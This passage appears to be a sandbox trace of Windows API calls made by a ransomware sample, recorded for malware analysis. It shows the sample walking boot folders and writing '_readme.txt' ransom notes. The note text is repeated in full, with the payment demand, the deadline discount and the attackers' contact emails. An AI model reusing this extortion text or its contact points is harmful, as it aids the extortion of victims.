lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.583] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0180.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.584] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.585] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.585] PathFindFileNameW (pszPath="") returned="" [0180.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.585] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.585] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.585] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.586] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac4ee0 [0180.588] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0180.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.588] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0180.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.589] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.589] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.590] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.591] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*" (normalized: "c:\\boot\\zh-hk\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.592] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.592] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.592] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.592] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.593] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0180.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.610] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0180.610] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.610] HeapFree (in: 